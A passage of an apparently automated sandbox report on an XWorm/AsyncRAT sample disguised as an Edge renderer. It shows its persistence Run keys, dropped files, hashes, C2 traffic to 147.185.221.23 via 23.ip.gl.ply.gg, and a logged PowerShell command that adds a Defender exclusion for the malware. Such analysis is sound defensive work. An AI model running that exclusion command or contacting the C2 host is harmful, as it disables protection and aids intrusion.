                                                    • Execution Graph export aborted for target msedge.exe, PID 2408 because it is empty
                                                    • Execution Graph export aborted for target msedge.exe, PID 616 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 3944 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 5136 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 5948 because it is empty
                                                    • Execution Graph export aborted for target powershell.exe, PID 984 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • VT rate limit hit for: msedge_visual_render.exe
Time | Type | Description
16:10:06 | API Interceptor | 49x Sleep call for process: powershell.exe modified
16:10:52 | API Interceptor | 950444x Sleep call for process: msedge_visual_render.exe modified
22:10:55 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run msedge C:\Users\user\AppData\Roaming\msedge.exe
22:11:03 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run msedge C:\Users\user\AppData\Roaming\msedge.exe
22:11:12 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk
Match: 147.185.221.23
Associated Sample Name / URL | Detection | Threat Name | Context
exe030.exe | malicious | XWorm |
pQm8Ci3Dov.exe | malicious | XWorm |
jkL96SLfWS.exe | malicious | XWorm |
xtrSvgqQEW.exe | malicious | XWorm |
7PRbdkCn03.exe | malicious | XWorm |
8Hd0ZExgJz.exe | malicious | Blank Grabber, Umbral Stealer, XWorm |
6qwSgLbPO9.exe | malicious | XWorm |
RLesaPFXew.exe | malicious | SilverRat |
rboancbWce.exe | malicious | XWorm |
dUoETPmfo3.exe | malicious | Orcus |
Match: 23.ip.gl.ply.gg
Associated Sample Name / URL | Detection | Threat Name | Context
7PRbdkCn03.exe | malicious | XWorm | 147.185.221.23
8Hd0ZExgJz.exe | malicious | Blank Grabber, Umbral Stealer, XWorm | 147.185.221.23
RLesaPFXew.exe | malicious | SilverRat | 147.185.221.23
r8gcHFIf3x.exe | malicious | XWorm | 147.185.221.23
q0SpP6HxtE.exe | malicious | XWorm | 147.185.221.23
Match: SALSGIVERUS
Associated Sample Name / URL | Detection | Threat Name | Context
exe030.exe | malicious | XWorm | 147.185.221.23
pQm8Ci3Dov.exe | malicious | XWorm | 147.185.221.23
jkL96SLfWS.exe | malicious | XWorm | 147.185.221.23
xtrSvgqQEW.exe | malicious | XWorm | 147.185.221.23
7PRbdkCn03.exe | malicious | XWorm | 147.185.221.23
8Hd0ZExgJz.exe | malicious | Blank Grabber, Umbral Stealer, XWorm | 147.185.221.23
6qwSgLbPO9.exe | malicious | XWorm | 147.185.221.23
RLesaPFXew.exe | malicious | SilverRat | 147.185.221.23
mips.elf | malicious | Mirai, Moobot | 147.176.207.108
rboancbWce.exe | malicious | XWorm | 147.185.221.23
                                                                        No context
                                                                        No context
                                                                        Process:C:\Users\user\AppData\Roaming\msedge.exe
                                                                        File Type:CSV text
                                                                        Category:dropped
                                                                        Size (bytes):654
                                                                        Entropy (8bit):5.380476433908377
                                                                        Encrypted:false
                                                                        SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                        MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                        SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                        SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                        SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                        Malicious:false
                                                                        Reputation:moderate, very likely benign file
                                                                        Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:modified
                                                                        Size (bytes):64
                                                                        Entropy (8bit):0.34726597513537405
                                                                        Encrypted:false
                                                                        SSDEEP:3:Nlll:Nll
                                                                        MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                        SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                        SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                        SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                        Malicious:false
                                                                        Preview:@...e...........................................................
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:ASCII text, with no line terminators
                                                                        Category:dropped
                                                                        Size (bytes):60
                                                                        Entropy (8bit):4.038920595031593
                                                                        Encrypted:false
                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                        Malicious:false
                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                        Process:C:\Users\user\Desktop\msedge_visual_render.exe
                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 15 20:10:52 2024, mtime=Fri Nov 15 20:10:52 2024, atime=Fri Nov 15 20:10:52 2024, length=192512, window=hide
                                                                        Category:dropped
                                                                        Size (bytes):760
                                                                        Entropy (8bit):5.0312680934748535
                                                                        Encrypted:false
                                                                        SSDEEP:12:8HyyyjKg4fMtBj088CNlsY//tSLKRKKcjAsyVH5mpL9fmV:8Hyyy6fcjf8OZFsKRR4AsyypBm
                                                                        MD5:C94B81E1D2AD459122D12B6CAA99EFF6
                                                                        SHA1:55224FCAD34DB33E05618F9ABC0457D5D63C7F74
                                                                        SHA-256:5B7F4290994F2E71E73E07C80ACF6BD90F115CE23073E57AC7494B68E69ABF20
                                                                        SHA-512:4036AAC1A1EC8D2F7936C35F3DF5C44434A590E50572259FF490C699940D0761FD99B806E9F00F7DBBF5DD7C0314696FCD3C1E44117E73E08D7C4DDE7EC25A62
                                                                        Malicious:false
                                                                        Preview:L..................F.... .....$.7....$.7....$.7..........................t.:..DG..Yr?.D..U..k0.&...&...... M.....g...7....+.7......t...CFSF..1.....DWSl..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......DWSloY@.....B.....................Bdg.A.p.p.D.a.t.a...B.V.1.....oY<...Roaming.@......DWSloY<.....C.....................p...R.o.a.m.i.n.g.....`.2.....oY[. .msedge.exe..F......oY[.oY[...........................t...m.s.e.d.g.e...e.x.e.......Y...............-.......X....................C:\Users\user\AppData\Roaming\msedge.exe........\.....\.....\.....\.....\.m.s.e.d.g.e...e.x.e.`.......X.......571345...........hT..CrF.f4... .$.......,...W..hT..CrF.f4... .$.......,...W..E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                        Process:C:\Users\user\Desktop\msedge_visual_render.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):192512
                                                                        Entropy (8bit):6.3678048620261904
                                                                        Encrypted:false
                                                                        SSDEEP:3072:2rhv4AbmL4mkbrz9EO7PvJKRUGKXs+S++7KFSbxeY+qDDrMn:2r7bmclbX3ZGqStKEbxI
                                                                        MD5:E796B778B392F06DE4D340EC0F88B4CC
                                                                        SHA1:32561BF3B022AEF8A62BAC3E820EF7E3BC648F57
                                                                        SHA-256:1FF08D4CBE1A41C10692941C7835B93EA5738057DC381CF4704136436911DF05
                                                                        SHA-512:DCDBEB8D1720B2BFE8CE8C2311414B71EC090EB94DB53D379C08CBF7B17A25AC4BC9488315E867406BB1661A76DF223C953F01C7D40997FDF9CCB20DAAF4C8C7
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\msedge.exe, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\msedge.exe, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                        • Antivirus: ReversingLabs, Detection: 74%
                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5g............................>.... ... ....@.. .......................@............@.....................................W.... ..z.................... ....................................................... ............... ..H............text...D.... ...................... ..`.rsrc...z.... ......................@..@.reloc....... ......................@..B................ .......H........W..........&.....................................................(....*.r...p*. *p{.*..(....*.r!..p*. .e..*.s.........s.........s.........s.........*.rA..p*. ..e.*.ra..p*. ..?.*.r...p*. .x!.*.r...p*. .3..*.r...p*..((...*.r...p*. E/..*.r...p*. i...*&(....&+.*.+5sW... .... .'..oX...(*...~....-.(D...(6...~....oY...&.-.*.r...p*. ...*.r...p*. .l..*.rM..p*. ....*.r...p*. ..3.*.r...p*. .;..*..............j..................sZ..............*"(F...+.*:.t....(A...+.*.ry..p*.
                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                        Entropy (8bit):6.3678048620261904
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                        File name:msedge_visual_render.exe
                                                                        File size:192'512 bytes
                                                                        MD5:e796b778b392f06de4d340ec0f88b4cc
                                                                        SHA1:32561bf3b022aef8a62bac3e820ef7e3bc648f57
                                                                        SHA256:1ff08d4cbe1a41c10692941c7835b93ea5738057dc381cf4704136436911df05
                                                                        SHA512:dcdbeb8d1720b2bfe8ce8c2311414b71ec090eb94db53d379c08cbf7b17a25ac4bc9488315e867406bb1661a76df223c953f01c7d40997fdf9ccb20daaf4c8c7
                                                                        SSDEEP:3072:2rhv4AbmL4mkbrz9EO7PvJKRUGKXs+S++7KFSbxeY+qDDrMn:2r7bmclbX3ZGqStKEbxI
                                                                        TLSH:1E147F1C6F8AB4EBE4684EB55C76E6D1073CEFA5E4A2529C30E8AE3D7752474C500BE0
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....5g............................>.... ... ....@.. .......................@............@................................
                                                                        Icon Hash:170105b232472f1f
                                                                        Entrypoint:0x410c3e
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                        Time Stamp:0x67350080 [Wed Nov 13 19:39:44 2024 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                        Instruction
                                                                        jmp dword ptr [00402000h]
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        add byte ptr [eax], al
                                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x10be4 | 0x57 | .text
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x12000 | 0x1fd7a | .rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x32000 | 0xc | .reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xec44 | 0xee00 | fc6d8f259588e0b8aa6c68eac805e6c5 | False | 0.612296481092437 | data | 6.102243758138122 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x12000 | 0x1fd7a | 0x1fe00 | d30e121a0f46ac585ee7407f60dc3e71 | False | 0.4359911151960784 | data | 6.174346559787132 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x32000 | 0xc | 0x200 | 793e22be1aa76d7a4ed9f01d024837a3 | False | 0.044921875 | data | 0.08153941234324169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x12220 | 0x7198 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9990027510316368
RT_ICON | 0x193b8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | | | 0.21535253756062936
RT_ICON | 0x29be0 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | | | 0.3363249881908361
RT_ICON | 0x2de08 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | | | 0.4050829875518672
RT_ICON | 0x303b0 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | | | 0.5145403377110694
RT_ICON | 0x31458 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024 | | | 0.7411347517730497
RT_GROUP_ICON | 0x318c0 | 0x5a | data | | | 0.7333333333333333
RT_VERSION | 0x3191c | 0x274 | data | | | 0.4570063694267516
RT_MANIFEST | 0x31b90 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5469387755102041
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-15T22:11:56.561263+0100 | 2855924 | ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound | 1 | 192.168.2.5 | 49984 | 147.185.221.23 | 57660 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 15, 2024 22:10:53.359515905 CET | 50838 | 53 | 192.168.2.5 | 1.1.1.1
Nov 15, 2024 22:10:53.372193098 CET | 53 | 50838 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 15, 2024 22:10:53.359515905 CET | 192.168.2.5 | 1.1.1.1 | 0xd763 | Standard query (0) | 23.ip.gl.ply.gg | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 15, 2024 22:10:53.372193098 CET | 1.1.1.1 | 192.168.2.5 | 0xd763 | No error (0) | 23.ip.gl.ply.gg | | 147.185.221.23 | A (IP address) | IN (0x0001) | false


                                                                        Target ID:0
                                                                        Start time:16:10:01
                                                                        Start date:15/11/2024
                                                                        Path:C:\Users\user\Desktop\msedge_visual_render.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\msedge_visual_render.exe"
                                                                        Imagebase:0x3f0000
                                                                        File size:192'512 bytes
                                                                        MD5 hash:E796B778B392F06DE4D340EC0F88B4CC
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.3338785172.0000000012701000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                        • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                        • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2055237317.00000000003F2000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                                        Reputation:low
                                                                        Has exited:false

                                                                        Target ID:2
                                                                        Start time:16:10:05
                                                                        Start date:15/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\msedge_visual_render.exe'
                                                                        Imagebase:0x7ff7be880000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        Target ID:3
                                                                        Start time:16:10:05
                                                                        Start date:15/11/2024
